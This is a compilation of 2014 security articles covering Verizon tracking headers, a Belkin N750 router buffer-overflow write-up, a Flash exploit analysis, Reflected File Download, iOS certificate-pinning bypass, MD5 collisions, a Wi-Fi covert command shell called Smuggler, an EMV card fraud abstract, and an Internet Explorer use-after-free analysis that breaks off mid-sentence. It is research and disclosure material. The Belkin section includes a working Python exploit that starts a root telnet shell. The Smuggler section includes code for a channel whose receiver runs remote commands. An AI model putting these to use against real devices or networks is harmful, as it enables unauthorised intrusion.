EFF: VPNs will crumble Verizon's creepy supercookie stalkers Now that ad networks are jumping on the privacy vulnerability By Iain Thomson, 6 Nov 2014 The Electronic Frontier Foundation says Verizon's silent supercookies, which always follow subscribers around the internet, are being abused by creepy advertisers to push targeted ads. The EFF says people should start using encrypted VPNs by default to claw back their privacy, because opting out of the system is not enough. Two years ago Verizon started stamping a unique identifier token header (UIDH) on each website visit made by subscribers via its cellular data network. As the name suggests, the identifiers are unique to each person, allowing website owners to quietly build up profiles on people using these ID codes. These records of online behavior are valuable to advertisers, as it allows them to get an idea of which adverts to display to each person: someone tracked across cycling websites will end up being shown ads for new bikes, for example. Verizon allows people to "opt-out" of the system, meaning the telco won't allow advertisers to directly request and analyze your online wanderings, but the setting is mostly useless: every single HTTP request via its network is stamped with a UIDH regardless of the opt-out, and is thus visible to any web server one visits. Now it appears that ad networks are using the UIDHs to monitor internet users without all that tiresome business of actually paying Verizon for the privilege, and since the system is baked in by the company there's very little people can do to stop them. Code has already appeared on Github (since removed) that would allow anyone with the right setup to track Verizon's identifier, and reports are surfacing that Twitter has also managed to find out a way to follow the telco's clients online using the UIDH information. The UIDH system is also pernicious in that it bypasses the anti-tracking measures in iOS and Android that are designed to protect mobile users' privacy: these measures tackle web cookies, rather than the specific UIDH HTTP header. "It is possible to build an opt-out system that would stop this, but it would take a considerable amount of work and the current systems just can't do it," EFF staff technologist Jacob Hoffman-Andrews told The Register. Stamping on a mandatory ID number on subscribers is such a nice idea that AT&T is also reportedly considering the same "feature" for its customers. The only way to block the use of the UIDH system is to use a VPN and/or Tor for your online browsing. Tor is usually your go-to software for privacy but it can be difficult to set up on a mobile, but almost all smartphones have a VPN mode baked in and Hoffman-Andrews recommended users activate it to maintain online anonymity. "The only way, in the short term, to stop this is if enough people complain about it," Hoffman-Andrews said. "Longer term, once we get encryption across the whole internet, this kind of thing will be less of an issue. But that's 10 or 20 years away at least." ® Sursa: EFF: VPNs will crumble Verizon's creepy supercookie stalkers • The Register

[h=1]From 0-day to exploit – Buffer overflow in Belkin N750 (CVE-2014-1635)[/h] Vulnerability Summary A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m, allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network. Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router. Vulnerability Discovery Fuzzing plays an important role in vulnerability discovery and this time was not different. After some fuzzed requests I noticed that the POST parameter “jump” suffered from a classic buffer overflow with a payload containing 5000 bytes. After the referred buffer overflow the process died. This behavior was consistent with a traditional buffer overflow and the question that popped in my mind was if this was exploitable. To try to clear this out I considered two possible approaches to be able to analyze the vulnerable process: Virtualization of the router process – would enable the debugging of the mips32 process in an x86 machine but probably needed some binary patching or function injection to bypass hardware or configuration access limitations on QEMU. Patching the router firmware – Would enable to open a backdoor and to put debugging tools inside the router with some risk of bricking the router in the process. In the first stage of the investigation I decided that virtualization of the affected process was the simplest and less risky approach to investigate the exploitability of this vulnerability. To get this done I downloaded the firmware to identify the process responsible for the crash. After binwalking the firmware and finding a linux mips32 system, both virtualization and patching approaches seemed viable since all files were extracted without problems. Binwalk extracted the squashfs filesystem from the image, and in few minutes the router filesystem was available to further analysis. By analyzing the strings in the http and minhttp binaries, it was possible to discover that the webserver available in the guest wifi network where the buffer overflow occurred was in fact minhttp. The Virtualization As stated above, to better analyse this vulnerability I decided to virtualize the minhttp process. For that I used qemu-mipsel-static since there is a lot of info about the subject and I had previous successful experiences with it. At first try qemu-mipsel-static refused to execute the minhttp deamon: The error “Can’t bind to any address” in this context means that the process is trying to bind to an IP address that does not exist on the system. A grep on the binary immediately discloses the IP address where the process was trying to bind. With the correct IP address on the interface, qemu is finally able to run the process, but after trying to access the contents of the site strace shows us that the CWD is wrong and that the process running with a wrong current working directory is not able to get and present the html files. This happens because the execution of the qemu must be done on a chroot of the firmware, which means that the execution of the binary will have the root of the file system of the firmware as CWD and not the /www as expected by minhttpd. To solve this issue I remembered of two possible approaches and both worked. The first was to use LD_PRELOAD to load a custom library hooking a used function in minhttpd and that function executes the Change Directory. The second was to use the binfmt module to execute in a seamless manner the mips32 binary and instead of executing the minhttpd directly from qemu I executed the mips32 /bin/sh inside the chroot of the firmware and then changed the CWD to the correct place before executing the minhttpd binary using the mips32 /bin/sh. To configure the binfmt I used the following signature: echo ‘:mipsel:M::\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00:\xff\xff\xff \xff\xff\xff\xff\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff\xff:/usr/bin/qemu-mipsel-static:’ > /proc/sys/fs/binfmt_misc/register The following image shows the execution of the mips32 process on an x86 system using binfmt: After all the tweaks necessary to put the process running I activated the instruction tracing in QEMU (-d in_asm,cpu) and confirmed the exploitability: Ok now, I had confirmation that this vulnerability could be exploited with a payload with mips32 machine code. While trying to identify the correct amount of bytes I used incremental buffers and noticed that the minhttp process had different behaviors with different payload sizes: Bellow ±1300 bytes the request was correctly handled Above ±1300 and below ±2000 the minhttp process returned an empty http response Above ±2000 bytes the minhttp process crashed It seemed that a buffer size between ±1300 and ±2000 crashed something, but was not enough to crash the process. This strange behavior needed a deeper analysis and quickly after stracing the process I had confirmation that this vulnerability was much more than a simple buffer overflow with remote machine code execution. The strace below shows that buffers bigger than ±1300 bytes trigger some kind of execution using /bin/sh. With a payload that is big enough, it is possible to execute the string on the request as we can see on the underlined execve(). But how to take advantage of this backdoor-like vulnerability? The Disassembler came in my help. Reverse Engineering for the root cause Using the IDAPro disassembler I was able to identify the problem, the overflow occurred due to the usage of the insecure strcpy() function. The vulnerability exists due to improper buffer handling using the strcpy() function in the address 0×00402570 as presented in the image below: The source buffer processed by strcpy() comes from POST parameter “jump” and is returned by the get_cgi() function in 0×00402550. The buffer overflow enables the control of a variable named do_xread located in the heap and that is used to decide the execution of CGIs. The decision point occurs at address 0x0040338C where the $v1 register that has the value of the overwritten do_xread is compared with zero. The CGI execution is done using the popen() function as we can see in address 0x004033D0. The popen() function opens a process by creating a pipe, forking, and invoking the shell, so the argument to popen() is supposed to be a pointer to a null-terminated string containing a shell command line that will be passed to /bin/sh using the -c flag. The name of the CGI to be executed is also in the heap and somewhere between 0x004476D0 and 0x00447AD0 near do_xread. So since the two variables are conveniently near each other it is possible with only one oversized payload processed by strcpy() to overwrite the do_xread(the control variable) and the byte_4476D0 (variable with the name of the CGI to be executed). As described before, the name of the CGI is processed with popen() so, instead of a file name we can inject several commands at once, separated for instance by semi-colon. This vulnerability enables control over a part of heap memory where a variable that forces the execution of a CGI and also the variable with the name of the CGI to be executed are stored. In conclusion, the requirements for injecting commands are fulfilled. Vulnerability Exploitation An attacker could exploit this vulnerability by preparing a special POST where the parameter “jump” takes some padding (1379 bytes) concatenated with the commands to be executed and with something different from zero to overwrite the do_xread and enter the section of code that invokes the popen() by failing the jump BEQZ at address 0x0040338C. The image below shows the execution of the utelnetd using this exploit. Exploit Code The following Python code to exploit this vulnerability enables the execution of commands in the router, in this case the telnet service is started and by default the login program is /bin/sh so… with no login prompt. #!/usr/bin/python #Title : Belkin n750 buffer overflow in jump login parameter #Date : 28 Jan 2014 #Author : Discovered and developed by Marco Vaz <mv@integrity.pt> #Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C) import httplib headers = {} body= “GO=&jump=”+ “a”*1379 +”%3b”+ “/usr/sbin/utelnetd -d” +”%3b&pws=\n\n” conn = httplib.HTTPConnection(“192.168.169.1?,8080) conn.request(“POST”, “/login.cgi”, body, headers) response = conn.getresponse() data = response.read() print data I have developed a Metasploit module to exploit this vulnerability that also executes iptables commands so that it is possible to access telnet server directly from the guest network to the root shell. You can get it here: belkin_rce_cve-2014-1635.rb. Written by Marco Vaz Sursa: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/

Cracking the CVE-2014-0569 nutshell msft-mmpc 5 Nov 2014 5:00 PM ?The Microsoft Malware Protection Center (MMPC) has recently seen an exploit targeting the Adobe Flash Player vulnerability CVE-2014-0569. This exploit is being integrated into the Fiesta exploit kit. The vulnerability related to this malware was addressed with a patch released by Adobe on 14 October 2014. Adobe Flash Player desktop runtime for Windows versions 15.0.0.167 and earlier are vulnerable. If you're using a vulnerable Adobe Flash Player version you should update now to help protect your PC. We analyzed how these attacks work and found the following details. The exploit successfully bypasses the validation of memory range and is able to access an arbitrary location. It attempts to corrupt the VTABLE entry for the virtual function toString( ) of sound object. Later, the ActionScript calls the Sound.toString() method and control is transferred to the controlled address, as shown in Figure 1. Figure 1: Transfer control via a corrupted VTABLE Sound.toString() At the controlled address, it starts the ROP gadgets built from the Flash Player DLL, as shown in Figure 2. Figure 2: Control transferred to ROP gadgets These ROP gadgets are a bit convoluted, but they can be summarized in following steps: The gadgets prepare the data on the stack using a loop of the following gadgets: dec eax // decrement the address to build code ret pop ecx // store the code bytes in ECX ret mov dword ptr [eax],ecx // store the code to the address specified by EAX pop ebp ret The control is passed to (via a ret instruction) API VirtualAlloc() to allocate a 0x1000 byte buffer. It uses gadget: mov dword ptr [eax],ecx // store the code pop ebp ret to build some new gadgets at the start of the allocated buffer, for example: mov dword ptr [eax+0Ch],ecx ret These new gadgets build up a small piece of two-layer decryption code to decrypt the shellcode: Control is passed over to the fully decrypted shellcode. The shellcode downloads a file from the remote server and executes it. The downloaded file is detected as TrojanDropper:Win32/Ropest.A. As well as keeping your software up-to-date, we also recommend running a real-time security product such as Microsoft Security Essentials to help protect your PC from this and other threats. Chun Feng MMPC Sha1: 468f23ef2f6318ea59a3cbc5570ac766435a5315 (detected as Exploit:SWF/Fiexp.B) 61a776fda7d50655ea336b22499573250fa8761d (detected as TrojanDropper:Win32/Ropest.A) Sursa: Cracking the CVE-2014-0569 nutshell - Microsoft Malware Protection Center - Site Home - TechNet Blogs

Reflected File Download - A New Web Attack Vector PLEASE NOTE: As promised, I've published a full white paper that is now available for download: White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif. On October 2014 as part of my talk at the Black Hat Europe 2014 event, I presented a new web attack vector that enables attackers to gain complete control over a victim’s machine by virtually downloading a file from trusted domains. I decided to call this technique Reflected File Download (RFD), as malware can be "downloaded" from highly trusted domains such as Google.com and Bing.com without ever being uploaded. As long as RFD is out there, users should be extremely careful when downloading and executing files from the web. The download link might look perfecty fine and include a popular, trusted domain and use a secure connection, but users still need to be wary. Look at the following link for example. Up until a few months ago, it could have been used to steal ALL cookies from your browser, perform actions on your behalf and steal emails from your Gmail inbox: https://www.google.com/s;/ChromeSetup.bat Google fixed the vulnerability so that the link above now only downloads a harmless text file. RFD, like many other Web attacks, begins by sending a malicious link to a victim. But unlike other attacks, RFD ends outside of the browser context: 1) The user follows a malicious link to a trusted web site. 2) An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was “hosted” on the trusted web site. 3) The user executes the file which contains shell commands that gain complete control over the computer. Figure 1 – The three steps attack flow of reflected file download For a Reflected File Download attack to be successful, there are three simple requirements: 1) Reflected – Some user input is being “reflected” to the response content. This is used to inject shell commands. 2) Filename – The URL of the vulnerable site or API is permissive and accepts additional input. This is often the case and is used by attackers to set the extension of the file to an executable extension. 3) Download – The response is being downloaded and a file is created “on-the-fly” by the Web browser. The browser then sets the attacker-controlled filename that was parsed in requirement 2 above. Figure 2 – A service is vulnerable if the three RFD requirements are met Articol complet si video: Reflected File Download - A New Web Attack Vector - SpiderLabs Anterior

Intercepting the App Store's Traffic on iOS TL;DR: By default, MobileSubstrate tweaks do not get injected into system daemons on iOS which explains why my SSL Kill Switch tool wasn’t able to disable SSL certificate validation in the iTunes App Store. The problem Last year I released the iOS SSL Kill Switch, a tool designed to help penetration testers decrypt and intercept an application’s network traffic, by disabling the system’s default SSL certificate validation as well as any kind of custom certificate validation (such as certificate pinning ). While the tool worked well on most applications including SSL-pinning apps such as Twitter or Square, users reported that it didn’t work the iTunes App Store, which would still refuse to connect to an intercepting proxy impersonating the iTunes servers. Other similar tools such as Intrepidus Group’s trustme also seemed to have the same limitation. A quick look at the App Store on iOS The first step was to get the right setup: An intercepting proxy (Burp Pro) running on my laptop. An iPad with the SSL Kill Switch installed, and configured to use my laptop as the device’s proxy. After starting the App Store app, I noticed that I could already intercept and decrypt specific SSL connections initiated by the App Store: all the HTTP requests to query iTunes for available apps (as part of the App Store’s tabs such as Featured'',Top Charts’’, etc.) as well as app descriptions (Details'', Reviews’’). However, more sensitive operations including user login or app installation and purchase would fail by rejecting my intercepting proxy’s invalid SSL certificate. From looking at logs on the device, it turns out that two distinct processes are behind the App Store’s functionality: AppStore[339] <Warning>: JS: its.sf6.Bootstrap.init: Initialize itunesstored[162] <Error>: Aug 22 11:29:10 SecTrustEvaluate [root AnchorTrusted] AppStore is the actual App Store iOS application that you can launch from the Springboard. It is responsible for displaying the App Store UI to the user. itunesstored is a daemon launched at boot time by launchd, the process responsible for booting the system and managing services/daemons. tunesstored seems to be responsible for the more sensitive operations within the App Store (login, app purchase, etc.) and possibly some of the DRM/Fairplay functionality. Why SSL Kill Switch didn’t work I initially thought the issue to be that the strategy used by the SSL Kill Switch to disable certificate validation somehow wasn’t enough to bypass itunesstored’s certificate pinning. However, it turns out that the SSL Kill Switch was just not being injected into the itunesstored process at all, for a couple reasons: The itunesstored process is started as a daemon by launchd early during the device’s boot sequence, before MobileSubstrate and MobileLoader get started. Therefore, none of the MobileSubstrate tweaks installed on the device, including the SSL Kill Switch, get injected into this process. The SSL Kill Switch had a MobileLoader filter so that the code disabling certificate validation would only be loaded into apps linking the UIKit bundle (ie. applications with a user interface). This was initially done to restrict the effect of the SSL Kill Switch to App Store apps only. However, itunesstored is a daemon that doesn’t have a user interface, hence the filter prevented MobileLoader from injecting the SSL Kill Switch into the process. Man-in-the-Middle on itunesstored After figuring this out, getting itunesstored to stop validating SSL certificates was very straightforward. First of all, make sure you’re using the latest version of the SSL Kill Switch (at least v0.5). Then, all you need to do is kill the itunesstored process: iPad-Mini:~ root# ps -ef | grep itunesstored 501 170 1 0 0:00.00 ?? 0:01.95 /System/Library/PrivateFrameworks/iTunesStore.framework/Support/itunesstored 0 432 404 0 0:00.00 ttys000 0:00.01 grep itunesstored iPad-Mini:~ root# kill -s KILL 170 When doing so, launchd will automatically restart itunesstored. This time however, MobileLoader will inject the SSL Kill Switch’s code into the process. You can validate this by looking at the device’s logs, for example using the xCode console. You should see something like this: itunesstored[1045] <Notice>: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/SSLKillSwitch.dylib itunesstored[1045] <Warning>: SSL Kill Switch - Hook Enabled. If you restart the App Store app, you should then be able to proxy all the traffic and see app store transactions such as logins or app downloads. If you try to install an app while proxying, your proxy might crash or freeze when the App Store tries to download the app because IPA files can be fairly large (200+ MB). Takeaway A similar methodology could be used to proxy other system daemons including for example accountsd, which is responsible for the Twitter and Facebook integration that was added to iOS 5 and iOS 6. While working on this, I also discovered a better way to disable SSL certificate validation and certificate pinning in iOS apps. Hence, SSL Kill Switch v0.5 is actually a complete rewrite. If you’re interested in knowing how it works, I wrote a blog post explaining what the tool does. Sursa: https://nabla-c0d3.github.io/blog/2013/08/20/intercepting-the-app-stores-traffic-on-ios/

iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill switch - Prateek Gianchandani In this article, we will look at how we can analyze network traffic for applications that use certificate pinning. One of the best definitions i found of certificate pinning is mentioned below. It is taken directly from this url. By default, when making an SSL connection, the client checks that the server’s certificate: has a verifiable chain of trust back to a trusted (root) certificate matches the requested hostname What it doesn’t do is check if the certificate in question is a specific certificate, namely the one you know your server is using. Relying on matching certificates between the device’s trust store and the remote server opens up a security hole. The device’s trust store can easily be compromised – the user can install unsafe certificates, thus allowing potential man-in-the-middle attacks. Certificate pinning is the solution to this problem. It means hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application. This also gives a possibility of trusting a host with a self-signed certificate without the need to install additional certificates on the device. Certificate pinning is used by many popular applications for e.g Twitter, Square etc. So the question that arises is, how do you bypass this certificate validation that is happening on the client side ? The important thing to note here is all that all the validation is happening on the client side. And since there are frameworks like Mobile Substrate that allow us to patch any method during runtime and modify its implementation, it is possible to disable the certificate validation that is happening in the application. A POC tool for this by released in Blackhat and it was named iOS SSL Kill Switch. The full presentation can be found here. After some time, the author realized that he was able to inspect traffic from apps that used certificate pinning (for e.g Twitter), but he wasn’t able to see the traffic going through the App Store app. He then realized he needed to patch even more low level methods and kill specific processes in order to inspect traffic going via the App store app. The full writeup for this could be found here and it’s quite interesting, so i suggest you give it a read. Also note that this tool will also be able to disable the default SSL certificate validation, so you don’t need to install a certificate as trusted root as well, which is what we usually do for inspeting traffic over HTTPs. To really check that the Twitter app uses certificate pinning, install the Twitter app and route the device traffic through Burp Proxy. Make sure you are inspect traffic via HTTP/HTTPS using the steps mentioned in Part 11 of this series. However, when you open the twitter app and navigate around, the traffic is not captured by Burpsuite. To inspect the traffic going via Twitter, ssh into your device and download the iOS SSL Kill Switch package from it’s releases link. Also, make sure to install the following packages via Cydia. dpkg MobileSubstrate PreferenceLoader Now install the deb package using the command dpkg -i . Now, respring the device using the command killall -HUP SpringBoard. Once this is done, go to Settings app. There will be a new menu for SSK Kill Switch and a slider to Disable certificate validation. Make sure the slider is set to on. Now route the traffic in the device to pass through Burp Proxy. Open twitter app and now you can see all the data going through via the twitter app as well. To verify that SSL Kill Switch is being injected into the application, go to Xcode -> Devices (I am using Xcode 6), look for your device in the left menu and click on the arrow pointing up in the lower left corner to see the device logs. You will see that SSL Kill Switch is being injected into the application. Another cool utility that does the same job is trustme. I recommend you check it out. Sursa: iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill switch - Prateek Gianchandani

Crypto collision used to hijack Windows Update goes mainstream Final nail in the coffin for the MD5 hash By John Leyden, 5 Nov 2014 The cryptographic hash collision attack used by cyberspies to subvert Microsoft's Windows Update has gone mainstream, revealing that MD5 is hopelessly broken. Security researcher Nat McHugh created two images of different rock 'n' roll icons - James Brown and Barry White - with the same MD5 hash. "The images were just two I lifted from the web ... in fact I could have chosen any image or indeed any arbitrary data and created a collision with it," McHugh reports. The process of computing padding data to produce the collision between two dissimilar images files was carried out on a mainstream cloud computing instance in a matter of hours at a cost estimated by McHugh as being less than a dollar. Brute force attempts to find cryptographic hash collisions – where two dissimilar files give the same hash value – are still impractical for anyone without access to a supercomputer. What McHugh was able to do was to add binary data to the end of two different JPEG images such that the two modified files gave the same hash value. Chosen prefix collisions for MD5 of this type were first successfully demonstrated in 2007. In a chosen prefix collision, the data preceding the specially crafted collision blocks can be completely different, as is the case of the images of the Godfather of Soul and the Walrus of Love. In a blog post, McHugh explains how he was able to work out what binary data to add to the end of the two image files. The chosen prefix collision attack works by repeatedly adding 'near collision' blocks which gradually work to eliminate the differences in the internal MD5 state until they are the same. Before this can be done the files must be of equal length and the bit differences must be of a particular form. This requires a brute force 'birthday' attack which tries random values until two are found that work. t does however have a much lower complexity than a complete brute force attack. Another researcher, Marc Stevens, has created framework for automated finding of differential paths and using them to create chosen pre-fix collisions. https://code.google.com/p/hashclash/ . McHugh chose to run Stevens's HashClash research tool on Linux, using a bash script to automate the repetitive steps needed, on an AWS GPU instance. "I found that I was able to run the algorithm in about 10 hours on an AWS large GPU instance" at a cost of around $0.65 plus tax per crack, according to McHugh. McHugh concludes that his exercise proves MD5 is hopelessly weak, outdated and no longer fit for purpose. MD5 is well and truly broken. Whilst the two images have not shown a break in the pre-image resistance or second pre-image resistance, I cannot think of a single case where the use of a broken cryptographic hash function is an appropriate choice. It was a chosen prefix collision attack similar to this that was used to produce a counterfeit SSL certificate used to sign the Flame malware as Microsoft and pass itself off as a Windows update. Other security experts were inclined to agree with McHugh's conclusion that MD5 is a dead duck. "If you can't even distinguish between Barry White and James Brown, it's time to send MD5 to hashing algorithm heaven," said Martijn Grooten, editor of Virus Bulletin and sometime security researcher, in a Twitter update. A cryptographic hash algorithm such as MD5 converts data into a shortened "message digest" from which it ought to be impossible to recover the original information. This one-way technique is used to generate digital signatures for software downloads, among other functions. Bootnote Flame used a chosen-prefix collision attack against MD5 in order to generate a rogue CA certificate. The sophisticated malware, discovered in 2012 but probably circulating since 2010, was used in a cyber-espionage attack against Middle Eastern countries. Most of the infected systems were located in Iran. The Washington Post claimed in June 2012 that Flame had been jointly developed by the NSA and Israel’s military as part of the same Olympic Games operation that spawned Stuxnet. Put very simply, Flame carried out surveillance and mapped networks while Stuxnet sabotaged the control systems of nuclear processing centrifuges. Sursa: Crypto collision used to hijack Windows Update goes mainstream • The Register

Smuggler - An interactive 802.11 wireless shell without the need for authentication or association I’ve always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information is sent between stations. Much of this additional information is not all that useful from a security perspective. This additional information that I speak of is known as “Information Elements” (IE), which are contained in 802.11 wireless management frames [1]. The Dot Eleven wiki states, “IEs are a device’s way to transfer descriptive information about itself inside management frames. There are usually several IEs inside each such frame, and each is built of type-length-values mostly defined outside the basic IEEE 802.11 specification.” With regards to IEEE 802.11, these information elements are as follows: (0) SSID, (1) Rates, (2) FHset, (3) DSset, (4) CFset, (5) TIM, (6) IBSSset, (16) challenge, (42) ERPinfo, (46) QoS Capability, (47) ERPinfo, (48) RSNinfo, (50) ESRates, (221) vendor and (68) reserved. I wanted to experiment with these IEs directly. Scapy is a powerful tool that allows such access to this layer via Dot11Elt [2]. Using Scapy I wrote some code to extract the SSID and rates IEs as a proof of concept, the code for this is below. [receiver.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements receiver POC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * def packets(pkt): if pkt.haslayer(Dot11) : if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "" : # if management frame and beacon and SSID is blank print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info)) sniff(iface="mon0", prn = packets) This would extract the “SSID” and the “rates” IEs from all beacon management frames discovered which had a blank SSID. I then put together some code to act as the sender. Note that I am using an additional wireless card on mon1 to send packets. The receiver is using a different wireless card on mon0 to listen out for our packets. [sender.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements sender PoC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * conf.iface="mon1" # second wireless card ssid=sys.argv[1] # takes ssid from the command line rates=sys.argv[2] # takes “rates” from the command line def SendRates(rates): frame=RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/Dot11Beacon(cap="ESS")/ Dot11Elt(ID="SSID",len=len(ssid),info=ssid)/Dot11Elt(ID="Rates",info=rates)/ Dot11Elt(ID="DSset",info="\x03")/Dot11Elt(ID="TIM",info="\x00\x01\x00\x00") sendp(frame, verbose=1) SendRates(rates) # python sender.py “” rateshere The command above will result in a beacon management frame sent into the airwaves with a blank SSID and a “rates” information element of “rateshere”. The receiver will parse the frame and print the rates content out to the screen, in this case “rateshere”. I just utilised an IE in a way not originally intended to pass a message. At this point I did a little digging to determine if I was the first to stumble on this little gem. Turns out yes and no. Chandra, et al. [3] in 2007 explored hacking up the 802.11 protocol in order to broadcast additional information without the need for association. This was in the form of SSID and BSSID concatenation and adding in additional IEs to broadcast “coupons” for advertising purposes. The paper did not, however, discuss modifying using it as a two-way communications channel. Gupta V. and Rohil M.K. [4] in 2013 hacked up the 802.11 protocol to transmit information within the "Length" fields of the IEs. However, again this is only for broadcast purposes. So it seems that I am a little late to the party, however it also appears that I am doing things a little different – I am injecting into the actual IE. Furthermore, the research falls short on being restricted to a one way broadcast. What if I could create a two-way covert communications channel? Furthermore, what could I create without the fuss of association and authentication that is usually required in wireless networks before such communications can begin? What if an attacker could send commands and receive the output on this channel? That would be magic++ and then some. Ladies and gentlemen, I present you Smuggler. I expanded on the proof of concepts already discussed to create a tool called Smuggler. It is a two-way covert communications channel, which consists of an interactive wireless shell without the need for association or authentication, and it works like this: An attacker compromises a machine and starts up a receiver (client.py), much like the proof of concept. The receiver listens to management beacon frames with a blank SSID and, when spotted, extracts the rates IE. The evolution here from the proof of concept (v2.0 if you like…) is that the receiver has the operating system parse the rates IE as a command. The attacker leaves the compromised machine with the receiver running and heads off to grab some lunch. Enter the next act. The attacker comes back the next morning, sitting in the car park with a latte. The attacker uses Smuggler (smuggler.py) to create a management beacon frame (with a blank SSID) and a rates IE with their very own command. Now here comes the clever bit - the receiver parses the command found in the rates IE as already discussed, but wait, it then invokes clientprobe.py to construct management probe requests with the output of the command as the SSID. Smuggler on the attacker’s machine is listening out for these management probe requests and extracts the SSID, hence the output. The information is presented in an attractive looking shell not unlike bash. So, to summarise: Receiver (client.py): If management and beacon frame (AND blank SSID) seen, read rates (attackers_command) IE and send to the OS to parse. Process attackers_command Attacker send commands (smuggler.py): Construct management beacon frame (AND blank SSID) with a custom rates IE. Rates = attackers_command Exfiltration (clientprobe.py): Management frame, probe request, SSID = outputofcommand As a proof of concept the same machine is being used with two wireless cards, however, this would work exactly the same on two computers. The example below shows the attacker issuing the “who” command wirelessly (in the “rates” IE) through the wireless card on mon1 in a management beacon frame. The receiver parses this command and sends the output back wirelessly over another wireless card on mon0 via the SSID of a management frame probe request. What happens “under the hood” within the airwaves is shown below. Another proof of concept for your viewing pleasure. A number of text files which exist on the victim machine: The attacker recreates these commands over the wireless airwaves, all without association or authentication. I am not going to release Smuggler just yet - that is not the objective of this blog post. The objective of this post is that I wanted to share my findings of abusing a protocol in a way not intended and use it for bad things, such as creating this covert two-way communications channel without associating or authenticating. I have also created Anti-Smuggler to demonstrate that it is possible to detect such attacks. However, the proof of concept I have demonstrated is pretty basic in that it does not utilise any form of encryption. You would imagine such convert channels would be reinforced with several layers of security, encryption being just one of them. For the final treat; Anti-Smuggler detecting extraction of credit cards. The regular expressions can be expanded to cover all manner of things – directory listings, extraction of the passwd file, etc. [1] Chapter 4 - 802.11 Management frames - DotEleven [2] scapy: scapy.layers.dot11.Dot11Elt Class Reference - doxygen documentation | Fossies Dox [3] Chandra R., Padhye J., Ravindranath L., Wolman A. “Beacon-Stuffing: Wi-Fi without Associations”, In Proceedings of the Eighth IEEE Workshop Mobile Computing Systems and Applications (Tucson, Arizona, February 26-27, 2007) [4] Gupta G., Rohil M.K., “Bit-Stuffing in 802.11 Beacon Frame: Embedding Non-Standard Custom Information”, International Journal of Computer Applications (0975 – 8887), Volume 63 – No. 2 (February 2013) Posted by Tom Neaves on 03 November 2014 Sursa: Smuggler - An interactive 802.11 wireless shell without the need for authentication or association - SpiderLabs Anterior

Harvesting High Value Foreign Currency Transactions from EMV Contactless Credit Cards without the PIN Martin Emms, Budi Arief, Leo Freitas, Joseph Hannon, Aad van Moorsel School of Computing Science, Newcastle University Newcastle upon Tyne NE1 7RU, United Kingdom {martin.emms, budi.arief, leo.freitas, joseph.hannon, aad.vanmoorsel}@ncl.ac.uk ABSTRACT In this paper we present an attack, which allows fraudulent transactions to be collected from EMV contactless credit and debit cards without the knowledge of the cardholder. The attack exploits a previously unreported vulnerability in EMV protocol, which allows EMV contactless cards to approve unlimited value transactions without the cardholder’s PIN when the transaction is carried out in a foreign currency. For example, we have found that Visa credit cards will approve foreign currency transactions for any amount up to €999,999.99 without the cardholder’s PIN, this side-steps the £20 contactless transaction limit in the UK. This paper outlines our analysis methodology that identified the flaw in the EMV protocol, and presents a scenario in which fraudulent transaction details are transmitted over the Internet to a “rogue merchant” who then uses the transaction data to take money from the victim’s account. In reality, the criminals would choose a value between €100 and €200, which is low enough to be within the victim’s balance and not to raise suspicion, but high enough to make each attack worthwhile. The attack is novel in that it could be operated on a large scale with multiple attackers collecting fraudulent transactions for a central rogue merchant which can be located anywhere in the world where EMV payments are accepted. Download: http://homepages.cs.ncl.ac.uk/budi.arief/home.formal/Papers/CCS2014.pdf

Root Cause Analysis of CVE-2014-1772 – An Internet Explorer Use After Free Vulnerability 11:04 pm (UTC-7) | by Jack Tang (Threats Analyst) We see many kinds of vulnerabilities on a regular basis. These range from user-after-free (UAF) vulnerabilities, to type confusion, to buffer overflows, to cross-site scripting (XSS) attacks. It’s rather interesting to understand the root cause of each of these vulnerability types, so we looked at the root cause of an Internet Explorer vulnerability - CVE-2014-1772. We’d privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035. While this vulnerability was already patched some time ago, it is still a good example of UAF vulnerabilities in general. The code to trigger this vulnerability is below: Figure 1. HTML code to trigger vulnerability Before debugging, several flags must be set to make the job of analysis easier. Run the command gflags.exe /i iexplore.exe +hpa +ust to to enable the page heap (HPA) and user stack trace (UST) flags. This will make finding memory corruption and tracing heap allocation and frees easier. This file can be found in the Windbg installation folder. You can now run windbg, attach Internet Explorer, and use it to access the HTML file. Examining the JavaScript execution flow, when line 18 of the HTML code is executed, the crash happens: Figure 2. Output of crash We can see the EDI register point to a freed memory space, which leads to an access violation. What is the value of the EDI register? Let us look at the code below. Figure 3. Assembly code The above code tells us that the EDI is from the first argument, which is the CTreePos* type. We can assume the EDI is a pointer of CTreePos. Since the CTreePos object is freed, how can we get where the object is freed? Because the UST flag is set, we can use the 